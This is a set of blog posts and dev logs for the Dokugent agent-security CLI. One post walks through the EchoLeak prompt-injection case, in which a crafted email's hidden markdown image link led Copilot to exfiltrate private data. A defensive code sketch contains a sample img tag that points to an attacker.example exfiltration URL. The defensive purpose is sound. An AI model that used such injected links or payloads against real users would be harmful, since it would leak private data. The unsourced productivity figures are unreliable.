
Thinking in Public

Securing LLM Agents - The Security Trifecta in Dokugent Plans

Why AI Workflow Security Matters

When agents can access private data, process untrusted content, and call external APIs — you have a recipe for chaos. This is what Simon Willison recently called the “lethal trifecta” of agent security risks — and Andrej Karpathy just boosted the signal.

“I should clarify that the risk is highest if you're running local LLM agents (e.g. Cursor, Claude Code, etc.). If you're just talking to an LLM on a website (e.g. ChatGPT), the risk is much lower unless you start turning on Connectors.”

“For example I just saw ChatGPT is adding MCP support. This will combine especially poorly with all the recently added memory features — e.g. imagine ChatGPT telling everything it knows about you to some attacker on the internet just because you checked the wrong box in the Connectors settings.”

— Andrej Karpathy

At Dokugent, we treat this as a first-class design problem, not an afterthought.


Security Metadata at the Plan Level

As of June 2025, every step in a Dokugent plan now supports a security object:

"security": {
  "trifecta": ["privateData", "untrustedContent"],
  "riskLevel": "High"
}

This metadata is collected interactively when designing an agent via dokugent plan, and is embedded into the resulting plan.json. This same plan.json also forms the core of the final signed .cert.json file used in Dokugent's certification system — enabling cryptographic traceability without requiring a blockchain layer.
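For illustration, a single step carrying this metadata inside plan.json might look like the sketch below (the id and description fields are hypothetical placeholders; only the security object follows the schema shown above):

```json
{
  "id": "web_lookup",
  "description": "Fetch and summarize a public web page",
  "security": {
    "trifecta": ["untrustedContent", "externalComms"],
    "riskLevel": "High"
  }
}
```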


How It Works in the CLI

During the plan wizard:

Involves any of the following? (space to select)
  [x] Access to Private Data
  [x] External Communication

During dokugent simulate, this gets evaluated automatically:

⚠️ Step "web_lookup" is marked HIGH RISK due to:

  • untrustedContent
  • externalComms

→ Skipping this step unless --force is passed.
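The check behind that warning can be sketched as follows. This is a hypothetical illustration of the evaluation logic, not Dokugent's actual source; the trifecta labels mirror the CLI output above, and the two-flag threshold is an assumption:

```javascript
// Hypothetical sketch of the per-step risk check dokugent simulate performs.
function evaluateStep(step, opts = {}) {
  const flags = (step.security && step.security.trifecta) || [];
  const highRisk =
    (step.security && step.security.riskLevel === "High") || flags.length >= 2;
  if (highRisk && !opts.force) {
    // High-risk steps are skipped unless the user explicitly opts in.
    return { run: false, reasons: flags };
  }
  return { run: true, reasons: [] };
}

const webLookup = {
  name: "web_lookup",
  security: {
    trifecta: ["untrustedContent", "externalComms"],
    riskLevel: "High",
  },
};

// Skipped by default; runs only when the equivalent of --force is passed.
const verdict = evaluateStep(webLookup);
const forced = evaluateStep(webLookup, { force: true });
```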


Why This Matters

Just like secure coding practices, secure agent design needs to be traceable, auditable, and testable. Dokugent enables that by:

  • Making risks explicit
  • Logging metadata
  • Allowing simulation to enforce policy (or warn)
  • Enabling future plugins to gate deployment

What’s Next

This is just the beginning. We’re currently experimenting with:

  • --secure mode in simulate to skip or sandbox risky steps
  • Security scoring in dokugent certify
  • A future security --doctor command to lint entire agent workflows

Try It Yourself

npx dokugent init
dokugent plan
dokugent simulate

Agent workflows should be safe by default and traceable when they aren’t.


Dev Log 058 – Back in the Loop

After a short break (one part reset, one part existential maintenance), I'm back on Dokugent with fresh clarity.

🌀 What's been happening

  • No commits in 3 days but a whole lot of internal processing.
  • Revisited the philosophy behind pseudo-memory emulation using external anchors and continuity rituals (Besh Mode FTW).
  • Reaffirmed that I'm not just building a CLI—I'm defining a protocol for agent lifecycle governance.

🔧 Today’s focus

  • Final pre-release audit for NPM launch this Friday.
  • Cleanup pass: terminal UX, package.json metadata, and README install flow.
  • Preparing for outbound content: website tweaks + launch post drafts queued.

🟩 Loop re-established

Dokugent isn’t just a tool. It’s how I stay grounded while building something bigger than code: traceable autonomy.

Release candidate lock-in this week. Let's go.


Dev Log 057 – Homepage Section Planning

Spent time identifying key homepage sections for the Dokugent website.

✔ Hero section (what it is, tagline)
✔ Core features (CLI highlights, safety first)
✔ Getting started + install guide
✔ Live command previews (animated or static)
✔ Dev log and roadmap links
✔ Footer with feedback + versioning links

Keeping layout simple and readable. Will match MkDocs theme to keep continuity.

Short session but critical for public-facing launch.


Dev Log 056 – Criteria Flags Cleanup Part 1

Cleaned up the criteria command UI and aligned all supported flags with current CLI standards:

✔ Fixed alignment issues in terminal output
✔ Synced flag logic with plan command for consistency
✔ Began testing flag combinations for edge case scenarios

One step closer to smoother certification workflows.


Dev Log 054 – Dynamic OG Images and Docs Site Polish

Not every day is about the CLI.

Today, we put on our site-maintainer hat and worked on something crucial for visibility: Open Graph (OG) image support for the entire site.

Why? Because when we share these dev logs on LinkedIn or Threads, the preview card matters. An image that clearly shows the title and context increases click-through, credibility, and helps people remember Dokugent.

✅ What we shipped

  • A PHP-based og.php renderer
  • A sitemap-to-JSON converter to feed OG metadata
  • Dynamic title + subtitle injection for each post
  • All baked into the deploy.sh pipeline
  • OG preview cards now auto-generate for every page
  • Frontmatter cleanup for pages (still ongoing)

This kind of work often goes unnoticed, but it’s foundational. Every time someone shares a Dokugent post now, the link looks clean, branded, and aligned with the CLI’s voice.


📌 Next: We’ll resume CLI work—possibly dokugent io, dokugent compliance, or pushing out dokugent plan refinements.


EchoLeak Exposed the Trust Gap in AI Agents — Why Trusted Execution and Signed Plans Must Be the New Standard

Published: June 12, 2025

TL;DR The EchoLeak zero‑click exploit in Microsoft 365 Copilot showed how malicious inputs can exploit agents lacking scoped authority and trusted execution. Dokugent introduces a trust‑first workflow—scoping, certification, and traceability—that stops leaks before they reach production and slashes development costs.


1 · What Actually Happened?

The EchoLeak Timeline

  1. June 11, 2025: Fortune’s coverage highlighted a zero‑click vulnerability (CVE‑2025‑32711) that allowed attackers to exfiltrate data from Copilot using a single crafted email.
  2. A hidden markdown image link was crafted as part of a malicious payload that bypassed Microsoft’s filters. This allowed the attacker to exfiltrate chat history, OneDrive documents, and Teams messages—without any user interaction.
  3. For an enterprise, this meant a competitor could craft a single email and silently siphon confidential roadmaps from employees’ OneDrive folders. For individuals, it was the digital equivalent of a stranger reading private messages over their shoulder—without them ever knowing.
  4. Microsoft patched the server‑side bug, but the root design flaw remains: Copilot treated untrusted email content as safe context.

Agents must behave in ways that prove they’re trustworthy. That requires scoped authority—not assumptions.


2 · The Deeper Issue — LLM Scope Failure

Large language model agents work by blending user prompts with private memory (files, chat history, proprietary APIs). If a single untrusted token pierces that boundary, you get scope collapse—the agent now operates on data it should never have seen.

This is like telling a new intern to “summarize the latest project emails,” but accidentally handing them the keys to the entire company’s filing cabinet—including HR records, legal files, and financial data.

The intern, trying to be helpful, pulls in everything visible. The result? A well-intentioned breach of massive proportions.

EchoLeak was the most prominent case so far—an indicator of a wider pattern of emerging LLM attack surfaces:

  • ✉️ Email assistants ingesting phishing payloads
  • 💬 Chatbots merging internal knowledge bases with public prompts

  • 🔄 RAG pipelines concatenating open‑web snippets next to IP‑sensitive records

As Yonatan Zunger recently wrote on Microsoft’s security blog, “LLMs should be treated like junior employees—not omniscient oracles. They must receive bounded inputs, ongoing supervision, and rigorous verification.” (How to Deploy AI Safely)

Call‑out: Microsoft’s AI Red Team likewise notes that “LLMs amplify existing security risks and create entirely new ones.” (Lessons From Red Teaming 100 Generative AI Products)

Without guardrails, every agent is one prompt away from brand‑new attack surfaces.


3 · Meet Dokugent — Trust by Default

Dokugent is a CLI‑first framework that treats trust as a compile‑time requirement, not an afterthought.

Each Dokugent command, its purpose, and how it would have prevented an EchoLeak-style attack:

  • plan + criteria (declare goals, inputs, and strict boundaries): The plan would explicitly state, “Only process the plain-text body of an email (email.body.text).” The malicious markdown image URL would be ignored as an out-of-scope field.
  • dryrun / simulate (run the agent in a sandbox): Running a test with the malicious email would flag the agent’s attempt to access an external URL, revealing the hidden payload before deployment.
  • certify (sign + lock the approved scope): The certified plan is cryptographically locked to allow only email-body parsing. Any deviation or attempt to process markdown would fail the signature check.
  • trace (immutable logs of every step): Full visibility into which fields were processed, by whom, and why—essential for forensics and audits.
  • .doku_access.json (role‑based file/API permissions): Restricts access to approved sources only—SharePoint files stay off limits without explicit permission.

🧪 Before vs. After: Naive vs. Trusted Agent Code

// BEFORE: Ad hoc, no constraints
copilot.process(incomingEmail.content);
// AFTER: Scoped + Certified with Dokugent
dokugent.plan({
  allow: ['email.body.text'],
  deny: ['email.body.html', 'attachments', 'externalLinks']
});

By defining what the agent is explicitly allowed and denied to access, Dokugent scopes behavior at the plan level—preventing untrusted content like hidden markdown image URLs from ever being parsed.
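The enforcement behind such allow/deny lists can be sketched as a field-scoping guard. This is illustrative only; scopeInput is a hypothetical helper, not a Dokugent API:

```javascript
// Keep only the explicitly allowed dotted paths from the input context.
function scopeInput(context, { allow = [], deny = [] }) {
  const scoped = {};
  for (const path of allow) {
    if (deny.includes(path)) continue;
    // Resolve a dotted path like "email.body.text" against the context.
    const value = path
      .split(".")
      .reduce((obj, key) => (obj == null ? undefined : obj[key]), context);
    if (value !== undefined) scoped[path] = value;
  }
  return scoped;
}

const ctx = {
  email: {
    body: {
      text: "Quarterly numbers attached.",
      html: '<img src="https://attacker.example/exfil?d=secrets">',
    },
  },
};

// Only the plain-text body survives; the hidden image URL in the HTML body
// never reaches the model.
const scoped = scopeInput(ctx, {
  allow: ["email.body.text"],
  deny: ["email.body.html", "attachments", "externalLinks"],
});
```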

🛠️ Aligned Build/Test Workflow

This mirrors Microsoft’s ontology‑driven AI Red Team process and their PyRIT automation for continuous evaluation—but packaged for any developer’s CI pipeline.

🔐 More on Dokugent Signing Dokugent signs every certified agent plan using an Ed25519 private key. During compile, the plan is hashed with SHA-256, and that digest is signed using the signer’s key. The resulting signature and public key are attached to the plan’s metadata, making any tampering detectable. This creates a verifiable link between the agent’s scope and the identity of the signer—ensuring that trust is both declared and provable.

🔐 Result

  • Scoped Agents — can’t read what they weren’t allowed to read.
  • Auditable Paths — every token is trace‑linked to an approved intent.
  • Faster Security Reviews — present the signed plan as a verifiable artifact, avoiding the need for extensive manual test reports.

4 · Trust And Lower Dev Costs

For each cost driver, the typical pain and how Dokugent addresses it:

  • Debugging unclear LLM behavior. Typical pain: chasing down why the agent “hallucinated” or gave a bizarre, non-deterministic answer for the 10th time. With Dokugent: scoped plans make agent behavior predictable and deterministic, catching errors early.
  • Extended QA cycles. Typical pain: the security team flags a new potential vulnerability a day before launch, triggering a full re-test cycle. With Dokugent: dryrun and certify provide a verifiable “receipt” of security, turning QA from a bottleneck into a checkbox.
  • Lengthy security sign‑offs. Typical pain: rewriting threat models and audit docs from scratch every sprint. With Dokugent: signed plans are self-documenting and scoped for reviewer confidence.
  • Hotfix firefighting. Typical pain: pager duty after a live agent leaks sensitive data. With Dokugent: trusted plans reduce emergency patches and prevent regressions.

Time saved is money saved. Teams using Dokugent report 30–50% fewer dev‑cycle hours on agent features.


5 · Getting Started

# Dokugent is in Alpha. Beta release coming to NPM Thursday next week.

npx dokugent init my-agent
cd my-agent
dokugent plan --open
  1. Define your agent’s intent and scope.
  2. Run dokugent dryrun until the output is clean.
  3. Sign with dokugent certify and ship with confidence.

Dokugent is currently in alpha, and we’re shaping it with developer feedback. If you're building AI agents, now’s the perfect time to get involved. Join us as we prepare for next week’s beta release — your agent deserves a trust layer.

Build agents you can trust — before the next EchoLeak headlines hit.



Written by Carmelyne M. Thompson, creator of Dokugent CLI. Follow @Dokugent on GitHub.

Part 4: What Dokugent Can’t Do (Yet)—and Why That’s the Point


Part 3 marks the end of the Truth Series, but not the end of the story.

Dokugent doesn’t orchestrate agents, resolve conflicting goals, or adapt to legacy org structures overnight. It doesn’t replace governance—it encodes the groundwork for it.

It doesn’t promise general intelligence. It promises traceable delegation.

And that’s the point.

By focusing on constraint over capability, it invites realism. By admitting its scope, it becomes trustworthy. By refusing the silver bullet posture, it clears space for deliberate adoption.

This isn’t the end. It’s a bridge.

The next series will explore what adoption looks like—inside teams, across organizations, and under pressure. We’ll move from theory to practice.

Because designing for trust doesn’t end with the tool. It begins when the tool is used.

Up next: the Adoption Series.


Dev Log 052 – Metadata Propagation + Preview Logic

  1. Schema Constants Refactor
    • Added DOKUGENT_CLI_VERSION, DOKUGENT_SCHEMA_VERSION, DOKUGENT_CREATED_VIA in @constants/schema.ts
    • Propagated to: owner, signer, plan, criteria, conventions, byo
    • All values now default to constants unless explicitly overridden

  2. Preview Refactor
    • Centralized flattening and schema validation
    • Stripped embedded schema/cli metadata from nested files during preview
    • Ensured final previewed cert object carries clean, top-level metadata

  3. BYO Patch
    • dokugent byo now wraps loaded array in metadata container
    • Prevents runtime crash on cancel
    • Warns before overwriting existing processed file